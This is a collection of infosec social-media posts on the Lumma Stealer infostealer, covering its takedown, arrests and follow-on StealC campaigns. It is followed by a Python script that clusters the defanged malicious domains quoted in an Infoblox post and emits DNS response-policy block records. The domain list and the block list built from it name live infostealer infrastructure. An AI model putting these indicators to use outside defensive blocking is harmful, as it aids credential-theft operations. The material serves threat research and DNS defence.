Brad<p>2025-06-26 (Thursday): <a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> infection leads to a follow-up loader that retrieves a pen test tool hosted on GitHub and configures it as <a href="https://infosec.exchange/tags/malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malware</span></a>. </p><p>A <a href="https://infosec.exchange/tags/pcap" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>pcap</span></a> of the infection traffic, the associated malware, and IOCs are available at: <a href="https://www.malware-traffic-analysis.net/2025/06/26/index.html" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">malware-traffic-analysis.net/2</span><span class="invisible">025/06/26/index.html</span></a></p><p><a href="https://infosec.exchange/tags/Lumma" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Lumma</span></a></p>
The Threat Codex<p>Lumma meets LolzTeam<br><a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> <br><a href="https://intelinsights.substack.com/p/lumma-meets-lolzteam" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">intelinsights.substack.com/p/l</span><span class="invisible">umma-meets-lolzteam</span></a></p>
Mateusz Chrobok<p>Usually I report to you (politely, of course) on leaks, thefts, espionage and other security disasters. But today? We have two gigantic wins in the war against cybercriminals, and with a Polish accent! 🦫 </p><p>In the new episode I talk about the spectacular takedown of LummaStealer and the blow dealt to Danabot, two malicious beasts that for years poisoned the lives of companies and ordinary users around the world. How did they work? How were they taken apart? What were the consequences?</p><p>And most importantly: what does "fraud-as-a-service" look like from the inside, including prices, documentation and 24/7 customer support?</p><p>Episode prepared in cooperation with ESET and DAGMA Bezpieczeństwo IT🦾 </p><p>Have a look 👇<br><a href="https://youtu.be/fcTdhBq4U88" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="">youtu.be/fcTdhBq4U88</span><span class="invisible"></span></a> </p><p><a href="https://infosec.exchange/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cybersecurity</span></a> <a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> <a href="https://infosec.exchange/tags/Danabot" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Danabot</span></a> <a href="https://infosec.exchange/tags/ESET" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ESET</span></a> <a href="https://infosec.exchange/tags/DagmaBezpiecze%C5%84stwoIT" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>DagmaBezpieczeństwoIT</span></a></p>
The Threat Codex<p>Group-IB contributes to INTERPOL’s Operation Secure, leading to the arrest of 32 suspects linked to information stealer malware in Asia<br><a href="https://infosec.exchange/tags/LummaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LummaStealer</span></a> <a href="https://infosec.exchange/tags/RisePro" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>RisePro</span></a> <a href="https://infosec.exchange/tags/MetaStealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MetaStealer</span></a> <br><a href="https://www.group-ib.com/media-center/press-releases/interpol-infostealer-bust/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">group-ib.com/media-center/pres</span><span class="invisible">s-releases/interpol-infostealer-bust/</span></a></p>
Pyrzout :vm:<p>The strange tale of ischhfd83: When cybercriminals eat their own – Source: news.sophos.com <a href="https://ciso2ciso.com/the-strange-tale-of-ischhfd83-when-cybercriminals-eat-their-own-source-news-sophos-com/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">ciso2ciso.com/the-strange-tale</span><span class="invisible">-of-ischhfd83-when-cybercriminals-eat-their-own-source-news-sophos-com/</span></a> <a href="https://social.skynetcloud.site/tags/rssfeedpostgeneratorecho" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>rssfeedpostgeneratorecho</span></a> <a href="https://social.skynetcloud.site/tags/CyberSecurityNews" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CyberSecurityNews</span></a> <a href="https://social.skynetcloud.site/tags/cybercrimeforums" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cybercrimeforums</span></a> <a href="https://social.skynetcloud.site/tags/ThreatResearch" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ThreatResearch</span></a> <a href="https://social.skynetcloud.site/tags/nakedsecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>nakedsecurity</span></a> <a href="https://social.skynetcloud.site/tags/nakedsecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>nakedsecurity</span></a> <a href="https://social.skynetcloud.site/tags/lummastealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>lummastealer</span></a> <a href="https://social.skynetcloud.site/tags/SophosXOps" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SophosXOps</span></a> <a href="https://social.skynetcloud.site/tags/AsyncRAT" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>AsyncRAT</span></a> <a href="https://social.skynetcloud.site/tags/backdoor" class="mention hashtag" 
rel="nofollow noopener" target="_blank">#<span>backdoor</span></a> <a href="https://social.skynetcloud.site/tags/FEATURED" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>FEATURED</span></a> <a href="https://social.skynetcloud.site/tags/asyncrat" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>asyncrat</span></a> <a href="https://social.skynetcloud.site/tags/Backdoor" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Backdoor</span></a> <a href="https://social.skynetcloud.site/tags/featured" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>featured</span></a></p>
Infoblox Threat Intel<p>Last week, Microsoft reported that their Digital Crimes Unit (DCU) and international partners disrupted Lumma Stealer by taking down 2,300 domains critical to the malware's operation. Shortly after, Palo Alto's Unit 42 reported that cyber campaigns that previously dropped Lumma Stealer are now distributing StealC infostealer payloads. We analyzed the DNS infrastructure related to the attacks and discovered a large number of malicious registered domain generation algorithm (RDGA) domains. Based on passive DNS, the threat actor that controls the infrastructure configured the domains to point to a staging environment via a dedicated Panama IP address (self-signed SSL) before deploying them. We identified 144 unique domains in this IP space, and all of them were detected as "suspicious" by our algorithms 1-2 months before they were activated for malicious activity.<br> <br>Disrupting criminal operations is difficult, and criminals will find ways to resurface. However, this example proves that blocking connections at the DNS level can often protect users against the new versions before they emerge. The infostealer actors made a quick turn, but we were already blocking their path. Our specialty is in DNS analytics, so we use DNS signatures, as opposed to malware signatures, for preemptive security. We love this stuff.<br> <br>Here are some examples of the RDGA domains:<br>2323dot2[.]cfd, 2323dot2[.]cyou, 2323dot2[.]my, 232pip1[.]my, 232pip1[.]sbs, 832pip[.]cfd, 832pip[.]cyou, 832pip[.]my, 832pip[.]sbs, b3cloud[.]cfd, b3cloud[.]cyou, b3cloud[.]my, b3cloud[.]sbs, bin48[.]cfd, bin48[.]cyou, bin48[.]my, bin898293[.]cfd, bin898293[.]cyou, bin898293[.]my, bin898293[.]sbs, bit7dl[.]cfd, bit7dl[.]cyou, bit7dl[.]my, bit7dl[.]sbs, bot113cloud[.]cfd, bot113cloud[.]cyou, bot113cloud[.]my<br> <br>These campaigns share similar TTPs with those that we reported several months ago. 
The threat actor that we discussed in this post (<a href="https://infosec.exchange/@InfobloxThreatIntel/114027715851469775" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">infosec.exchange/@InfobloxThre</span><span class="invisible">atIntel/114027715851469775</span></a>) also distributed Lumma Stealer and used RDGA domains, but incorporated additional components, such as traffic distribution systems (TDS), web trackers, and cloakers.<br> <br> <br><a href="https://infosec.exchange/tags/dns" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>dns</span></a> <a href="https://infosec.exchange/tags/threatintel" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>threatintel</span></a> <a href="https://infosec.exchange/tags/threatintelligence" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>threatintelligence</span></a> <a href="https://infosec.exchange/tags/cybercrime" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cybercrime</span></a> <a href="https://infosec.exchange/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cybersecurity</span></a> <a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>infosec</span></a> <a href="https://infosec.exchange/tags/infoblox" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>infoblox</span></a> <a href="https://infosec.exchange/tags/infobloxthreatintel" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>infobloxthreatintel</span></a> <a href="https://infosec.exchange/tags/infostealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>infostealer</span></a> <a href="https://infosec.exchange/tags/lummastealer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>lummastealer</span></a> <a 
href="https://infosec.exchange/tags/stealc" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>stealc</span></a> <a href="https://infosec.exchange/tags/tds" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>tds</span></a> <a href="https://infosec.exchange/tags/tracker" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>tracker</span></a> <a href="https://infosec.exchange/tags/cloaker" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cloaker</span></a> <a href="https://infosec.exchange/tags/rdga" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>rdga</span></a></p>
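The Infoblox post above lists RDGA domains that share one second-level label registered across several cheap TLDs (.cfd, .cyou, .my, .sbs) and argues for blocking them at the DNS level before the payload changes. The script below is an added example, not Infoblox's code or their detection algorithm: it refangs the defanged indicators quoted in the post, clusters them by registrable label, flags any label that appears under two or more of an assumed set of cheap TLDs, and emits response policy zone (RPZ) records that return NXDOMAIN for the flagged names and all their subdomains. The cheap-TLD set, the two-TLD threshold, the benign sample names and the single-label public-suffix assumption are all mine, not from the post.

```python
import re
from collections import defaultdict

# Domains quoted in the Infoblox post above, still defanged with "[.]".
OBSERVED = """
2323dot2[.]cfd, 2323dot2[.]cyou, 2323dot2[.]my, 232pip1[.]my, 232pip1[.]sbs,
832pip[.]cfd, 832pip[.]cyou, 832pip[.]my, 832pip[.]sbs, b3cloud[.]cfd,
b3cloud[.]cyou, b3cloud[.]my, b3cloud[.]sbs, bin48[.]cfd, bin48[.]cyou,
bin48[.]my, bin898293[.]cfd, bin898293[.]cyou, bin898293[.]my, bin898293[.]sbs,
bit7dl[.]cfd, bit7dl[.]cyou, bit7dl[.]my, bit7dl[.]sbs, bot113cloud[.]cfd,
bot113cloud[.]cyou, bot113cloud[.]my
"""
# Constructed benign names (assumption, not from the post) so the clustering
# has something it must leave alone.
BENIGN = "example[.]com, example[.]org, docs[.]example[.]net"

# Assumption: low-cost, loosely policed TLDs seen in the post's domain list.
CHEAP_TLDS = {"cfd", "cyou", "my", "sbs"}


def refang(token):
    """Turn a defanged indicator like 'bin48[.]my' back into 'bin48.my'."""
    return token.replace("[.]", ".").strip().lower().rstrip(".")


def parse_iocs(text):
    """Split a comma/whitespace separated indicator list into refanged domains."""
    return [refang(t) for t in re.split(r"[,\s]+", text) if t.strip()]


def registrable(domain):
    """Return (label, tld). Assumption: single-label public suffixes only,
    so 'docs.example.net' -> ('example', 'net'); co.uk-style suffixes are
    not handled here."""
    labels = domain.split(".")
    return labels[-2], labels[-1]


def cluster_by_label(domains):
    """Group TLDs under each registrable label: {'bin48': {'cfd','cyou','my'}}."""
    clusters = defaultdict(set)
    for d in domains:
        label, tld = registrable(d)
        clusters[label].add(tld)
    return clusters


def flag_rdga_clusters(domains, min_cheap_tlds=2):
    """Flag labels registered under >= min_cheap_tlds of the cheap TLDs.
    Returns {label: sorted list of every TLD it was seen under}."""
    flagged = {}
    for label, tlds in cluster_by_label(domains).items():
        if len(tlds & CHEAP_TLDS) >= min_cheap_tlds:
            flagged[label] = sorted(tlds)
    return flagged


def rpz_records(flagged):
    """RPZ zone records. 'CNAME .' is the RPZ encoding for NXDOMAIN; the
    wildcard line catches subdomains the actor has not activated yet."""
    records = []
    for label, tlds in sorted(flagged.items()):
        for tld in tlds:
            fqdn = f"{label}.{tld}"
            records.append(f"{fqdn} CNAME .")
            records.append(f"*.{fqdn} CNAME .")
    return records


def should_block(qname, flagged):
    """Resolver-side check: block qname if it or any parent is a flagged name."""
    blocked = {f"{label}.{tld}" for label, tlds in flagged.items() for tld in tlds}
    labels = qname.lower().rstrip(".").split(".")
    return any(".".join(labels[i:]) in blocked for i in range(len(labels)))


if __name__ == "__main__":
    flagged = flag_rdga_clusters(parse_iocs(OBSERVED + "," + BENIGN))
    for line in rpz_records(flagged):
        print(line)
    print("update.bin48.my blocked:", should_block("update.bin48.my", flagged))
    print("docs.example.net blocked:", should_block("docs.example.net", flagged))
```

Run it as a script to print the RPZ zone body; the resulting lines can be dropped into a zone loaded as a response policy zone by BIND or Unbound-compatible resolvers. The wildcard records are what make this preemptive: a host the actor has staged but not yet used, say a fresh subdomain under bin48.my, is refused on first lookup without anyone having seen its payload.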